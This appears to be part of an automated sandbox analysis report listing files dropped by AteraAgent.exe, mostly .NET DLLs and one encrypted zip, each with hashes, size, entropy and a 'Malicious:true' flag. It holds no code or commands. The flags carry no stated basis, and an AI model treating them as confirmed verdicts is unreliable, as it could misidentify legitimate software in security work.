                                                                                                                                                                                                                                                                                              MD5:82E0D4E69D23A3C5343563EF21C1A48F
                                                                                                                                                                                                                                                                                              SHA1:8C918651007B7D240042F5FB20F88ED277718BFC
                                                                                                                                                                                                                                                                                              SHA-256:6AA4EEDE0E8E16A736CF564BC72FC92CA041998554C6FD76B251BF273250E46A
                                                                                                                                                                                                                                                                                              SHA-512:EE9C1CCAF458A5F5247B18D6757CD9554AA2C983D2F8B703E59C5D64AA471F69CEC75C5F1EB76E01AC44251DA436C70C9196838E542C5ED2CCACC796FA7C0F48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):345168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.141597338666124
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:Vpc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8wef:spTCqAn+fnw5h9hdls+IZTWc+
                                                                                                                                                                                                                                                                                              MD5:B30DEB887F1258145FFAC337D5319A80
                                                                                                                                                                                                                                                                                              SHA1:E9482F5E6F21860AD127A8CB8A799D96A7834218
                                                                                                                                                                                                                                                                                              SHA-256:6D28E9004F465C3E84DBFD05E2994CC0EC3880395C11441066BDE2B1BA91D766
                                                                                                                                                                                                                                                                                              SHA-512:2D85AD1262BB7B59FBF59932647725918B3FA78B400731DD7E8C7679A327979730ABC2627FFF628E40A7F2B11B0CD9EE5257523AD1768554114F681AE663D607
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710736
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954086635941875
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:oFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMj:AzMTMNNd+g5Wk78GBBjgrIQtDM
                                                                                                                                                                                                                                                                                              MD5:AA6CAB34DC85D06F21E3D857B8D497B3
                                                                                                                                                                                                                                                                                              SHA1:51945573743CA2D94F4BA8C89426ED8E93F0D593
                                                                                                                                                                                                                                                                                              SHA-256:93590886AA04268BC311DAD9C243D4F33D25AC4657038F82B98C344D8F64C579
                                                                                                                                                                                                                                                                                              SHA-512:459E227BD031D6EF6B60F259A565F37BC472F356EFDE3F8A5AD7CB1F4EBDC2EE47BCAA947759A40147864074CA383208721CEE988CD5A37194E6EFDC9BDBB6ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):241232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.259472728909943
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:bBf5J52Gi4mbKnUMZFfS76JoMvHc0MUnB6gijdDREMhbUYTTQjgiOI8mIPfDJ0O:+54mbKnUMZFfS76JoMvHc0MEixNb9f
                                                                                                                                                                                                                                                                                              MD5:D14EED4B9C285F3C482CCB5C6CD9E9A7
                                                                                                                                                                                                                                                                                              SHA1:35A55F5409BE072BD946F563242E466D7C77B3FD
                                                                                                                                                                                                                                                                                              SHA-256:D405D92E477FEE9467972C83D85D93B2B98CFE5842B2C16E9FD7D46D278D0994
                                                                                                                                                                                                                                                                                              SHA-512:099A4DE22A13DD7FA70D3E54517A1733260FCA03165FCD7230E80A529301C2CAB7F4DC0DA3D0B5C68DAF47418546572CFA8A1C768663490654FCC88D2C1A3BBE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):294480
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.211185870057264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:eRnDreuO4up/qhteg9zo8THff0jfDyj5zAQzFWhxBNYibsus16W2hS1o:dY2steg9pbff0jfDyj5zAQzFWMR16h
                                                                                                                                                                                                                                                                                              MD5:9E5556915A2BFFA443C325643DE43FBA
                                                                                                                                                                                                                                                                                              SHA1:A2D3E0DBD177BAEAAB51E316AD77AC63B845F7B9
                                                                                                                                                                                                                                                                                              SHA-256:77E88BBD02B50D21EDDB07EF162460EFC6C420FFFD6B7F389AA81E5F13DEC743
                                                                                                                                                                                                                                                                                              SHA-512:747C752666E63881ADE2AD95AC863AD647336B627C1EA2DD696E8B0B8A2BA9EBC11B849A655DC35F146F488CC1A39069011713FF6D5A82A91AD49EF70B4C2203
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40016
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.290573860045289
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:o0e1ybJtobISqLnqhs6icPGlSkEuNxS9HucEpYi60Vf:3Is6NG8kdNQ9Ha760
                                                                                                                                                                                                                                                                                              MD5:618EEFCF08F8DF431B6A22181C4B9D08
                                                                                                                                                                                                                                                                                              SHA1:FFB3A7A8BC7B7484C242D8E7D7556D29793E2B2F
                                                                                                                                                                                                                                                                                              SHA-256:70888B4D4B1677857BA439C93645D0207A4FBDF4E3364D33F8F1E89E1B860B97
                                                                                                                                                                                                                                                                                              SHA-512:4F44473FA665B4D16919F6370D81D57083020C10938ABE722DE86DFCC3BDA31C72AFD6566FEF99764481CAAF44E79BD9AAD6D6C786473BD55A882C2FCDB1929D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40016
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.103957712578852
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:FjH0yVIotetvBnRKRTrNn7V+gByboak4EpYi6055l:VUyV1yARTRV1CkB76e5l
                                                                                                                                                                                                                                                                                              MD5:DF02B20DAB4C8084377A4C297B5F9662
                                                                                                                                                                                                                                                                                              SHA1:A5E8B7B36AE9C7576CEF2EB2FB8629F9CF7B9647
                                                                                                                                                                                                                                                                                              SHA-256:069E2C7EFD99C50C1FBFF1EE53D467E3946D0905115FB3B708BB016EE5721A9B
                                                                                                                                                                                                                                                                                              SHA-512:EB85CB82999720AB9E90338F8BED379CB07885FA237F38667598AAB3E1CC3403E016AD9822FC0E123DA5147A0511DFC648B5982D90A86880E3F762CE2B3A328F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.316016485866323
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:8OTQws5P6l+m38DHBXLSycBHdDVXR/yx0PtmF4zxKEpYi60RG:hQVPW+gKZZcdXR6HGh766G
                                                                                                                                                                                                                                                                                              MD5:625498DFF2B539512B1CC21C6B7F8AA8
                                                                                                                                                                                                                                                                                              SHA1:E6F8CF4F273D1DCD9E4867BF9A36EAA1CA2B00A8
                                                                                                                                                                                                                                                                                              SHA-256:7C1D0084DC61B3CCA2BDCB291067D75555DC7E279583C2B3C21C3542239D9B5C
                                                                                                                                                                                                                                                                                              SHA-512:CA6501BD2D7CB6A68A0F63E9495E3D07169CF8AD6C3F1F045399E9644B02D5C355B31BD86019292953D96849DAEDE81FF8F2289EB12F2D71D73B2F39039094B6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):163408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.235571259002522
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:2CMB8etU5lH7HXpqgkZEw3O5WNYvmjpkZyFnbNFk97WoNKaiDOTbzdLn9fIMKQaT:2CM/tUjH7HXpeJpX2fH99SQW
                                                                                                                                                                                                                                                                                              MD5:08920BD7402F10B95F9D54D7541064F5
                                                                                                                                                                                                                                                                                              SHA1:941AE89184ACBBB5D1593888C727BA7E72BCD86E
                                                                                                                                                                                                                                                                                              SHA-256:E00C95E3190BBB2D4C06A0C59470EE8C8BE2FA2CD9F69A70327846CBF0312148
                                                                                                                                                                                                                                                                                              SHA-512:F3410CBD824E279383DDC0412D5A1B0BA2E623000179A67020B1E9DE5B84FD34E67EEEECB546A50A83EB26ADC7B1106D421A341140989DE1A8524F9E4A4D78E1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51792
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.187613362430376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:0xlSUXovBJ2nMNEGyxP+M+yOI3/YPyHlwir0EqgIGfmAXOaYb7bEpYi60PX:0nS3BJ27GyxP+M+ytiiAgILb7U76q
                                                                                                                                                                                                                                                                                              MD5:FE92440233C03428D39105EE8689042D
                                                                                                                                                                                                                                                                                              SHA1:294FCC4521EB959442C4F32215221F0735472B9B
                                                                                                                                                                                                                                                                                              SHA-256:8254BC47076020DD5CA444D480819CAAF3C32FD4C9176A36B9C61627200EB56E
                                                                                                                                                                                                                                                                                              SHA-512:3547EEC3DD123CFFBBD5F4B63B92BCDB9B060B88061F6B0322CC3706CF0499C25B5C6F1EED9CB98BF0829128742330AEBCA8F13C833E783437BC0D41DB09AEF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33360
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.3190237273268846
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:uQ4EbR32/LNT07ANLN92D1NltSIEpYi60TI:u/ENGLl07ANLN0pSx76MI
                                                                                                                                                                                                                                                                                              MD5:D36FAF66D58F5314800FC31E9D5A8466
                                                                                                                                                                                                                                                                                              SHA1:2E5A4790F4CE129E6051205EFEC593FD0F8381EC
                                                                                                                                                                                                                                                                                              SHA-256:94FF2234A26B28DCC0A5529B5F4A54764DDCD98812FAA6658165F8BC888DA721
                                                                                                                                                                                                                                                                                              SHA-512:7D664BCA31935A3C1C53AEDA7267BF5771CB36C506D02E613D5DE403BA2BA10538459879599D82A4C0895A91C5A0641AA609E07648F6092B497A08905F4477B5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.560006548424685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:AiWWNv/jzSENtqcadVl8PandjJUf7ZJSqSi/ufPU1S5rxg0XWr:v1Nvb5adVl8P2djJMZJSGu3z5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:63E9B310597AC25A1CEAA55B6F0CC9F3
                                                                                                                                                                                                                                                                                              SHA1:0C5B170ABA511F479E593727CF7F562523EA7E8C
                                                                                                                                                                                                                                                                                              SHA-256:96B51BB87A1F4072D10B774FFADF81AF93881900571D21FE638E10E3FB0220B8
                                                                                                                                                                                                                                                                                              SHA-512:3BAF3836F8F42DF2D3444409115A3564B0961CD3141CC46E248E6E29A59EC773E511477D8DED4BE05125F2F45E987FD6F94AC5676C318A728B7CA63EB78E9056
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.43329064965383
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:ycWWNv/jzSEStoC1vxx6hUltfxx+BE00cUnAPq115rxg0XWr:yc1NvbGVxx6hUltfxgE00cLq5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:94136496103CA7B4425EB6D639EEC501
                                                                                                                                                                                                                                                                                              SHA1:AC8F3F4E7C04D4BEEFBA94004A114880662C8387
                                                                                                                                                                                                                                                                                              SHA-256:A3A44472A3944FF0D5C31241BF6DD9B6AE04EAE03581D338B53E3E41EED7141D
                                                                                                                                                                                                                                                                                              SHA-512:04F4614C5BCF97EC643079D50FFA800B2F89A503E02D7DA6FF97AA463993A6964833068063C5A144C7E7D44BEAF082B43EA672F66B4E831EC2CE828666C4965B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.581775279455886
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:R/WWNv/jzSEYtPpmKJiDjgmlRFI0HYZDKz/VPH1g5rxg0XWr:R/1NvbdKJiDjgmlRi0HYZDMa5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:8C7822BE67F1576F2E11817826ABE40E
                                                                                                                                                                                                                                                                                              SHA1:9B9EDD5FEE4415CB7FB09F0940BEAAFF1C107EB7
                                                                                                                                                                                                                                                                                              SHA-256:C9A7CFE32AB4567D671A84397ABDA29CC92B21CB412CE0F0DF12352C68B7460F
                                                                                                                                                                                                                                                                                              SHA-512:70F76DFFB3FE25F1D3550BEC3C168805AB422C6A0505DDDD21EB2A5B59F24D5F37AEDE0DBEBCF16F821868789E17A87AE61442BE6525ECA0461C0146E4E6B850
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.368843686720491
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:IiWWNv/jzSE5tyT1TNgr1nJIhZAf/07mPk1q5rxg0XWr:31NvbGTNgr1nJI3+07M75rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:79C01911FD90F929CCBD1D4964D2C17A
                                                                                                                                                                                                                                                                                              SHA1:1878855F9C350B245C3258204A754770CAD776A3
                                                                                                                                                                                                                                                                                              SHA-256:E8F0F7F9E9F2D836AAA341A39D3B395B397BAC0B88F6DDED3F159A6C8D2D74A1
                                                                                                                                                                                                                                                                                              SHA-512:0C820224F516FE888621C09E3ED1870AC4B702AB97B1CE3CE4463445FC96F9D8798C97B6AE6ECFF1175D8D8EE8657052AF0E42D03B55340635CF9F5E65A9D6FA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.593201257102684
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:9SWWNv/jzSEYtq2dE1cxy8ON0Qsk96sPE1V5rxg0XWr:9S1NvbaG1cxy8ONHskd85rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:437252DA54AB3171BC7DE366E5494AD8
                                                                                                                                                                                                                                                                                              SHA1:A4FCFD9240B28C836240D4CAA4C9EC8DE38F6E9F
                                                                                                                                                                                                                                                                                              SHA-256:9BFB9826E286B55AA5A580A5C220114063871B1EA8C541DF783A73EF8E72806B
                                                                                                                                                                                                                                                                                              SHA-512:8D56A2EF0DE3B3BF16FE4D931EE6D6A8119E4CD7B3FFA52AC3EF65CEA2A2F4C4E99ED536757546A54CD5A2318A1BA4E70E6425367402CFD06345FEA6EE8442C0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.84740063117937
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:AHwWWNv/jzSEfthb7O9JKggIOrCPPzm394in3fwB/CZPlN1O5rxg0XWr:AQ1NvbH7O9JKgglrCPChnYVC5E5rxg06
                                                                                                                                                                                                                                                                                              MD5:44CC811E193FB220954A0E56AF6F7682
                                                                                                                                                                                                                                                                                              SHA1:B1437F518F3D8E8DEAD506D7E352B69593486244
                                                                                                                                                                                                                                                                                              SHA-256:8CDCF449550DF3F9CACD3A8A41D19D6144BB0FED630825D6118D4077F637BC35
                                                                                                                                                                                                                                                                                              SHA-512:E3FE956494F6179D6A725ECA38FE0E0739A14300DE035093212B0169BED45374E3792EBF7DF916996923777CCB9842C04D9B954D30094D51CE81A892D8F49385
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):801048
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7800450887072108
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:8qirVlWQX3WT56Os1HnhWgN7acWf53p13s5yX01k9z3Agrf8mNVf0nj:8BriQ+5kHRN76HcYR9zPrf8mrf0nj
                                                                                                                                                                                                                                                                                              MD5:7A44C33341844DBE9C6FA526AF88E80A
                                                                                                                                                                                                                                                                                              SHA1:0ACABD100F61A2F8B3C5E68A270599AD54EB8A39
                                                                                                                                                                                                                                                                                              SHA-256:68F73AB17FB7F4AFF3D35EF6DB0E9D5B0FA0151111CB3D03992E23BC29D6C40A
                                                                                                                                                                                                                                                                                              SHA-512:B81D63B345C193C6DEF17372311447D305AE167B2C4D1C2FDB0344D1E1EF5FF4F9D52599FFD862B2480825B308178737DF7E5E48C31E712339F009E92B6EAF57
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):171784
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.142996498151589
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:CscEziGN+eKDIJDkqFzX3uW2tWWka+EInVL8QOuebyh52:nViG3dJDN9+xIWkaGilbeU
                                                                                                                                                                                                                                                                                              MD5:D746020927C079537618C3741FC13985
                                                                                                                                                                                                                                                                                              SHA1:1EF0C97A31CF8CEBAD508DCDD367255D70DCA751
                                                                                                                                                                                                                                                                                              SHA-256:5D65536889CACB7D87892BB9C71ACF01CF7FF0199273D774F8408B2466EA9DC4
                                                                                                                                                                                                                                                                                              SHA-512:5F22F3B5751A5BD82EC595CF0CDD552DE5047FFD535F84CF777456215622B8251AB838D9723489A065310913236FB7EAD430FAD2B6F4641AB22ECBF16DF94F70
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):87728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.028686758952157
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:G7PttVEhUdebIzkSmM7VuFvTb6wbN0pKxwwzoX:GlFeUISmM7VgCwbNKKSwW
                                                                                                                                                                                                                                                                                              MD5:634779CAF0A33D40C67D257ECB439827
                                                                                                                                                                                                                                                                                              SHA1:E18BF7CB362FF6AEEB714B2BB510E1B946A41D0F
                                                                                                                                                                                                                                                                                              SHA-256:087FFD8EA723D88AB278D68A1E20B1CB513FE3C2A53356308E58E3B91601A283
                                                                                                                                                                                                                                                                                              SHA-512:A687A4D72CDDD520EF6C4C9F47DC9164DE72DD1367330EF2D75152EB9F9D1ADA3B5EADF8DFB512C7EDFC7D816324B50D7C30671DF6455C6A66D8C833269AD178
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.709151479489131
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:0uWWNv/jzSEhtiBbSEmfO2mdqeCtzEc6yCPVo1L5rxg0XWr:J1NvbcbSEm22mdqet+ws5rxg0XWr
                                                                                                                                                                                                                                                                                              MD5:90289DA899746E328816734D723C93A0
                                                                                                                                                                                                                                                                                              SHA1:6AF8E30872729E89FE0A7C01D99DACF4AE6726CF
                                                                                                                                                                                                                                                                                              SHA-256:2B3853CEBEA222ABB31C2B1E3D6CD19A2F6621ABB56954162751A2B592680676
                                                                                                                                                                                                                                                                                              SHA-512:ABB6FE5216B412CD85E139D69657A40BEEBA00F2DD0DF1795AAD8CF27C13D9CE0EB2DCF3904CA445678D689CE56FA2C169ED7B40490181EA6B770B1A634A6D4B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9728
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.7267524338984295
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:T2WWNv/jzSEhtimYtEq40uI7Sr2fqmxkNeo7R7L7c7xM757odHK9nPo21f5rxg06:a1NvbOtEq40uYSatEdHwWloA9Pb5rxgJ
                                                                                                                                                                                                                                                                                              MD5:2356F25971B72EDBB3303AEA1BEFB9A1
                                                                                                                                                                                                                                                                                              SHA1:60780C3E4F36829A0038BF56CD929148A0A0523C
                                                                                                                                                                                                                                                                                              SHA-256:99C3F55737EBC53BA4EAA92FAAE23EC8AAB9149826E5D821D6BC976706BED237
                                                                                                                                                                                                                                                                                              SHA-512:3252FE8D4A04F4EF79DB76DEB446FBA236E0B281E0B1B35488198D8A5D8EF0F4890ED68DB0E93CA17CE3783B6A6A4D71EF5F8979F917E05D4DDAC638DF082A60
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1152141
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9996934105504405
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Y0MtJOalt7fQwfM+tshGvx5LBhqAc9sDQPfs8+5iaSpFiz:65Lm++hGZ5LnZMO8f+5Aiz
                                                                                                                                                                                                                                                                                              MD5:9A9B1FD85B5F1DCD568A521399A0D057
                                                                                                                                                                                                                                                                                              SHA1:34ED149B290A3A94260D889BA50CB286F1795FA6
                                                                                                                                                                                                                                                                                              SHA-256:88D5A5A4A1B56963D509989B9BE1A914AFE3E9EE25C2D786328DF85DA4A7820D
                                                                                                                                                                                                                                                                                              SHA-512:7C1259DDDFF406FDAADB236BF4C7DFB734C9DA34FD7BAD9994839772E298EBF3F19F02EB0655E773BA82702AA9175337BA4416C561DC2CB604D08E271CC74776
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
